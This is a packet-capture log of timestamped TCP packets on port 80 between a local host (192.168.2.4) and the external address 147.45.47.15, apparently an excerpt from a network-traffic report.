Dec 19, 2024 08:52:38.583383083 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.583427906 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.583834887 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.583848000 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.583899975 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.584295988 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.584309101 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.584321022 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.584594965 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.584969044 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.585222006 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.585235119 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.585272074 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.585289955 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.585669994 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.585681915 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.585695028 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.585736036 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.586472034 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.586484909 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.586497068 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.586510897 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.586522102 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.586544037 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.587234974 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.587248087 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.587263107 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.587291956 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.587327957 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.587835073 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.587847948 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.587893009 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.588291883 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.588304996 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.588386059 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.588407040 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.589040995 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.589068890 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.589082003 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.589113951 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.589138985 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.589831114 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.589843988 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.589855909 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.589867115 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.589896917 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.589920044 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.590614080 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.590626001 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.590637922 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.590677023 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.591376066 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.591389894 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.591401100 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.591428995 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.591449976 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.592103004 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.592116117 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.592128992 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.592140913 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.592160940 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.592297077 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.592884064 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.592897892 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.592911005 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.592947006 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.593657017 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.593671083 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.593683004 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.593703985 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.593792915 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.594336987 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.594358921 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.594371080 CET	80	49730	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.594383955 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.594428062 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.595134020 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.595148087 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.595160007 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.595174074 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.595263958 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.595318079 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.595909119 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.595922947 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.595935106 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.595999956 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.596044064 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.596669912 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.596683025 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.596694946 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.596786022 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.597464085 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.597476006 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.597489119 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.597501993 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.597527981 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.597563028 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.598243952 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.598257065 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.598269939 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.598299026 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.598344088 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.598788977 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.598800898 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.598813057 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.598855972 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.599582911 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.599595070 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.599607944 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.599642992 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.599684954 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.600306034 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.600320101 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.600378036 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.600687981 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.600701094 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.600713015 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.600836992 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.601382017 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.601402044 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.601417065 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.601465940 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.601495028 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.602150917 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.602169991 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.602231979 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.602507114 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.602521896 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.602534056 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.602595091 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.603244066 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.603256941 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.603270054 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.603302002 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.603326082 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.603769064 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.603781939 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.603827000 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.604233027 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.604245901 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.604316950 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.604693890 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.604707003 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.604805946 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.605153084 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.605165958 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.605220079 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.605597019 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.605612993 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.605670929 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.606053114 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.606065989 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.606123924 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.606518030 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.606530905 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.606544018 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.606575966 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.607177973 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.607254982 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.607398987 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.607413054 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.607485056 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.607894897 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.607908010 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.608007908 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.608299017 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.608547926 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.608562946 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.608613968 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.609162092 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.609225035 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.609448910 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.609462023 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.609476089 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.609545946 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.609997988 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.610052109 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.610160112 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.610371113 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.610589981 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.610603094 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.610636950 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.610893011 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.611146927 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.611254930 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.611330032 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.611504078 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.611784935 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.612278938 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.612292051 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.612327099 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.612776041 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.612788916 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.612792015 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.612839937 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.613274097 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.613287926 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.613343954 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.613703012 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.613852978 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.613928080 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.614278078 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.614291906 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.614326954 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.614769936 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.614900112 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.614939928 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.615257025 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.615335941 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.615616083 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.615643978 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.615850925 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.616029978 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.616044044 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.616075993 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.616099119 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.616369963 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.616718054 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.616765022 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.616847038 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.616861105 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.616928101 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.617295980 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.617311001 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.617360115 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.617808104 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.617820978 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.617834091 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.617861986 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.618446112 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.618465900 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.618479013 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.618531942 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.618549109 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.619119883 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.619133949 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.619146109 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.619191885 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.620107889 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.620121956 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.620134115 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.620184898 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.620260000 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.620698929 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.620712996 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.620748997 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.621073008 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.621085882 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.621098995 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.621134043 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.621772051 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.621784925 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.621797085 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.621865988 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.621968031 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.622519970 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.622533083 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.622544050 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.622561932 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.622615099 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.622642994 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.623228073 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.623239994 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.623251915 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.623289108 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.623997927 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.624008894 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.624020100 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.624052048 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.624078989 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.624902964 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.624916077 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.624927998 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.624942064 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.624977112 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.625005007 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.625503063 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.625515938 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.625528097 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.625565052 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.626271963 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.626286983 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.626296997 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.626332045 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.626390934 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.627010107 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.627023935 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.627036095 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.627048969 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.627073050 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.627083063 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.627810955 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.627825022 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.627837896 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.627881050 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.628714085 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.628727913 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.628740072 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.628774881 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.629312038 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.629327059 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.629339933 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.629348040 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.629362106 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.629369020 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.629441023 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.630050898 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.630065918 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.630076885 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.630116940 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.630821943 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.630836964 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.630848885 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.630880117 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.630947113 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.631598949 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.631613016 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.631625891 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.631639004 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.631652117 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.631685019 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.632338047 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.632352114 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.632364035 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.632419109 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.633099079 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.633112907 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.633125067 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.633167028 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.633181095 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.633877039 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.633891106 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.633903027 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.633914948 CET	80	49732	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.633971930 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.633975029 CET	49732	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:38.634615898 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.634629965 CET	80	49734	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.634639978 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:38.634651899 CET	80	49732	147.45.47.15	192.168.2.4
